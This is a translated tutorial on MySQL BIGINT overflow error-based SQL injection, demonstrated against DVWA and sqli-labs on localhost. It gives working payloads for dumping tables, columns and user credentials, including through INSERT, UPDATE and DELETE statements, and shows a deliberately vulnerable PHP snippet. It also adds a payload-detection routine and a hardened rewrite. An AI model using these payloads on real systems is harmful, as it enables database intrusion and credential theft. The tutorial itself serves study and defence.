Sqli-labs Background 2.4: BIGINT overflow error-based SQL injection

0x01 Overview


I have always been interested in new techniques for extracting data through MySQL error messages, and this article introduces one such technique. While examining how MySQL handles integers, I became curious about how to make an overflow happen. First, let us look at how MySQL stores integers.

MySQL supports the SQL standard integer types INTEGER (or INT) and SMALLINT. As an extension to the standard, MySQL also supports the integer types TINYINT, MEDIUMINT and BIGINT. The table at the source link below shows the storage space required for each integer type and its range.

(Source: http://dev.mysql.com/doc/refman/5.5/en/integer-types.html )

Only MySQL 5.5.5 and above produce an overflow error message; earlier versions report nothing on integer overflow.

The BIGINT data type is 8 bytes, that is, 64 bits, long. Its largest signed value is, in binary, hexadecimal and decimal respectively, "0b0111111111111111111111111111111111111111111111111111111111111111", "0x7fffffffffffffff" and "9223372036854775807". Arithmetic on this value, such as adding to it, causes a "BIGINT value is out of range" error.

mysql> select 9223372036854775807+1;
ERROR 1690 (22003): BIGINT value is out of range in '(9223372036854775807 + 1)'

To avoid the error shown above, we only need to convert the value to an unsigned integer.

For unsigned integers, the maximum value BIGINT can store is, in binary, hexadecimal and decimal respectively, "0b1111111111111111111111111111111111111111111111111111111111111111", "0xFFFFFFFFFFFFFFFF" and "18446744073709551615".

Similarly, arithmetic on this value, such as addition or subtraction, leads to a "BIGINT UNSIGNED value is out of range" error.

# In decimal
mysql> select 18446744073709551615+1;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551615 + 1)'

# In binary
mysql> select cast(b'1111111111111111111111111111111111111111111111111111111111111111' as unsigned)+1;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(cast(0xffffffffffffffff as unsigned) + 1)'

# In hex
mysql> select cast(x'FFFFFFFFFFFFFFFF' as unsigned)+1;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(cast(0xffffffffffffffff as unsigned) + 1)'

What happens if we apply bitwise NOT to the value 0? Obviously, we get the maximum unsigned BIGINT value.

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)

So, adding ~0 to a value, or subtracting it from one, produces a BIGINT overflow error.

mysql> select 1-~0;
ERROR 1690 (22003): BIGINT value is out of range in '(1 - ~(0))'
mysql> select 1+~0;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(1 + ~(0))'

0x02 Injection technique


My idea is to use a subquery to cause the BIGINT overflow and thereby extract data. We know that if a query returns successfully, its return value is 0, so its logical negation becomes 1. For example, with a subquery such as (select*from(select user())x), we get:

mysql> select (select*from(select user())x);
+-------------------------------+
| (select*from(select user())x) |
+-------------------------------+
| root@localhost                |
+-------------------------------+
1 row in set (0.00 sec)

# Applying logical negation
mysql> select !(select*from(select user())x);
+--------------------------------+
| !(select*from(select user())x) |
+--------------------------------+
|                              1 |
+--------------------------------+
1 row in set (0.00 sec)

Perfect! So, as long as we combine the bitwise NOT and the logical NOT appropriately, we can use the overflow error to make the injected query succeed.

mysql> select ~0+!(select*from(select user())x);
ERROR 1690 (22003): BIGINT value is out of range in '(~(0) + (not((select 'root@localhost' from dual))))'

Let us not use addition, because a "+" in a URL is converted to a space by the web browser (although you can use %2b to represent "+"). Instead, we can use subtraction. So the same injection can take a totally different form. The final query is shown below.

mysql> select (!(select*from(select user())x)-~0);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not((select 'root@localhost' from dual))) - ~(0))'

mysql> (select(!x-~0)from(select(select user())x)a);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'

mysql> (select!x-~0.from(select(select user())x)a);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'

For example, we may embed something like the following in a query statement:

mysql> select username, password from users where id='1' or !(select*from(select user())x)-~0;
ERROR 1690 (22003): BIGINT value is out of range in '((not((select 'root@localhost' from dual))) - ~(0))'

<http://localhost/dvwa/vulnerabilities/sqli/?id=1' or !(select*from(select user())x)-~0-- -|&Submit=Submit#>

With this BIGINT overflow-based error injection technique, we can use almost all of MySQL's mathematical functions, since they can also be negated. Specific usage is as follows:

select !atan((select*from(select user())a))-~0; 
select !ceil((select*from(select user())a))-~0;
select !floor((select*from(select user())a))-~0;

Below are the functions we have tested; if you wish, you can find more :)

HEX
IN
FLOOR
CEIL
RAND
CEILING
TRUNCATE
TAN
SQRT
ROUND
SIGN
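A defender-side check for this family of payloads, added here as an example that is not part of the original post: it normalizes a request parameter and flags the ~0 (or 0^N) arithmetic together with a negated subquery or math function, the combination this section relies on. The function names and the sample parameters are constructed.

```php
<?php
// Added example (not from the original post): flag request parameters that
// carry the operator combination this technique depends on, for WAF rules
// or log review. The sample requests below are constructed, not captured.

function normalize_param(string $raw): string
{
    // Decode twice (catches double-encoded %257E), lowercase, then strip
    // inline comments and all whitespace so obfuscated variants line up.
    $s = strtolower(urldecode(urldecode($raw)));
    $s = preg_replace('#/\*.*?\*/#s', '', $s);   // /* ... */ comments
    $s = preg_replace('/\s+/', '', $s);          // every whitespace run
    return $s;
}

function looks_like_bigint_overflow_payload(string $raw): bool
{
    $s = normalize_param($raw);
    // ~0 or ~(0) used as an arithmetic operand: the overflow trigger.
    $usesNotZero = preg_match('/[+\-]~\(?0\)?|~\(?0\)?[+\-]/', $s) === 1;
    // "- 0^222" style constant: the same trigger in XOR form.
    $xorForm = preg_match('/-0\^\d+/', $s) === 1;
    // Logical negation (!x, not(...)) combined with a SELECT: the value carrier.
    $negatesQuery = preg_match('/!|\bnot\b/', $s) === 1
        && strpos($s, 'select') !== false;
    return ($usesNotZero || $xorForm) && $negatesQuery;
}

// Constructed samples in the shape of DVWA's id parameter.
$samples = [
    "1' or !(select*from(select user())x)-~0-- -"   => true,
    "1' or !(select*from(select user())x)-%7E0-- -" => true,  // URL-encoded ~
    "(select!x-~0.from(select(select user())x)a)"   => true,  // ".from" spacing trick
    "!ceil((select*from(select user())a))-~0"       => true,
    "!(select*from(select user())a)-0^222"          => true,
    "7"                                             => false,
    "1 or 1=1"                                      => false, // other SQLi, not this one
    "price-~0"                                      => false, // ~0 alone, no subquery
];
foreach ($samples as $param => $expected) {
    $got = looks_like_bigint_overflow_payload((string)$param);
    printf("%s  %s\n", $got === $expected ? 'ok  ' : 'FAIL', $param);
}
```

A single literal "!" or "~0" in benign input is not enough to trigger the check; both the overflow operand and a negated SELECT must be present.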

0x03 Extracting data


The method of extracting data is the same as with other error-based injection techniques, so it is only described briefly here.

First, get the table names:

!(select * from (select group_concat(table_name) from information_schema.tables where table_schema=database())x)-~0

Get the column names:

select !(select * from (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')x)-~0;

Retrieve the data:

select !(select * from (select group_concat(id,0x3a,username,0x3a,password) from users)x)-~0;

0x04 One-shot dump


Can we dump all databases, tables and columns in one go? The answer is yes. However, when we dump the tables and columns of every database, we get only a few results, since after all we are retrieving data through the error message. If we dump from the current database instead, we can get up to 27 results. Examples follow.

!(select*from(select(concat(@:=0,(select count(*)from information_schema.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0

(select(!x-~0)from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)

(select!x-~0.from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)

This limits the number of results we can retrieve to at most 27. Suppose we created 31 tables in a database: we can only see 27 results, and the other four tables, as well as the remaining columns of the users table, cannot be returned.

0x05 Injecting via an insert statement


Using insert statements, we can carry out a similar injection. The concrete syntax is '' or (payload) or ''; whether to use single or double quotes depends on the particular query.

 insert into users (id, username, password) values (2, '' or !(select*from(select user())x)-~0 or '', 'Eyre');

We can also use a DIOS (dump in one shot) query.

insert into users (id, username, password) values (2, '' or !(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0 or '', 'Eyre');

0x06 Injecting via an update statement


Using an update statement, we can inject in the same way, as shown below:

update users set password='Peter' or !(select*from(select user())x)-~0 or '' where id=4;

0x07 Injecting via a delete statement


Similarly, we can also inject via a delete statement, as shown below:

delete from users where id='1' or !(select*from(select user())x)-~0 or '';

0x08 Summary


The reason this attack succeeds is that the mysql_error() message is returned to us; only then can we use it for injection. The overflow error itself is produced by MySQL 5.5.5 and above. These overflow attacks come in many different forms, for example:

mysql> select !1-0^222;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not(1)) - (0 ^ 222))'
mysql> select !(select*from(select user())a)-0^222;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not((select 'root@localhost' from dual))) - (0 ^ 222))'

Furthermore, the back-end code may not wrap the parameter in quotation marks or brackets at all. For example, if I modify the DVWA PHP code to remove the quotes around id, the injection no longer needs the '' or ... or '' wrapping used earlier.

<?php

if(isset($_GET['Submit'])){

    // Retrieve data
    $id = $_GET['id'];

    // Vulnerable: $id is interpolated unquoted, so an arithmetic payload
    // needs no quote to break out of a string literal
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
    // Vulnerable: the raw MySQL error text is echoed straight to the client
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );

    $num = mysql_numrows($result);

    $i = 0;
    $html = '';

    while ($i < $num) {

        $first = mysql_result($result,$i,"first_name");
        $last = mysql_result($result,$i,"last_name");

        $html .= '<pre>';
        $html .= 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        $html .= '</pre>';

        $i++;
    }
}
?>

<http://localhost/dvwa/vulnerabilities/sqli/?id=!(select*from(select user())a)-0^222 &Submit=Submit#>
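The same DVWA lookup rewritten defensively, as an added example that is not DVWA's or the author's code: it binds id as an integer parameter and keeps MySQL's error text out of the response, which removes both conditions the summary above names. The connection details and the lookup_user helper are assumptions.

```php
<?php
// Added example (not DVWA's code): the same lookup, hardened against the
// overflow-error injection shown above. Two things change: the id is bound
// as a parameter instead of being interpolated, and MySQL's error text is
// logged server-side instead of being echoed to the client.
// Assumed: a mysqli connection in $db (host and credentials are placeholders).

$db = new mysqli('localhost', 'dvwa_user', 'PLACEHOLDER_PASSWORD', 'dvwa');
$db->set_charset('utf8mb4');

function lookup_user(mysqli $db, string $rawId): string
{
    // Reject anything that is not a plain integer before it reaches SQL;
    // FILTER_VALIDATE_INT refuses "1' or !(select...)-~0-- -" outright.
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false || $id < 0) {
        return '<pre>Invalid ID</pre>';
    }

    // Prepared statement: the value travels separately from the query text,
    // so no arithmetic such as -~0 can be spliced into the WHERE expression.
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = ?');
    if ($stmt === false) {
        error_log('prepare failed: ' . $db->error);     // detail stays in the log
        return '<pre>Unable to process request</pre>';
    }
    $stmt->bind_param('i', $id);
    if (!$stmt->execute()) {
        // Never reflect $stmt->error ("BIGINT value is out of range in ...")
        // back to the browser: that echo is the channel the injection needs.
        error_log('query failed for id ' . $id . ': ' . $stmt->error);
        $stmt->close();
        return '<pre>Unable to process request</pre>';
    }
    $stmt->bind_result($first, $last);

    $html = '';
    while ($stmt->fetch()) {
        $html .= '<pre>ID: ' . $id
              . '<br>First name: ' . htmlspecialchars($first, ENT_QUOTES, 'UTF-8')
              . '<br>Surname: ' . htmlspecialchars($last, ENT_QUOTES, 'UTF-8')
              . '</pre>';
    }
    $stmt->close();
    return $html;
}

if (isset($_GET['Submit'])) {
    echo lookup_user($db, (string)($_GET['id'] ?? ''));
}
```

With display_errors off in production, even an unexpected failure path returns only the generic message while the full MySQL text lands in the server log.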

Translator: mssp299

Original Address: https://osandamalith.wordpress.com/2015/07/08/bigint-overflow-error-based-sql-injection/

Reference: https://www.cnblogs.com/lcamry/articles/5509112.html

Origin www.cnblogs.com/zhengna/p/12652201.html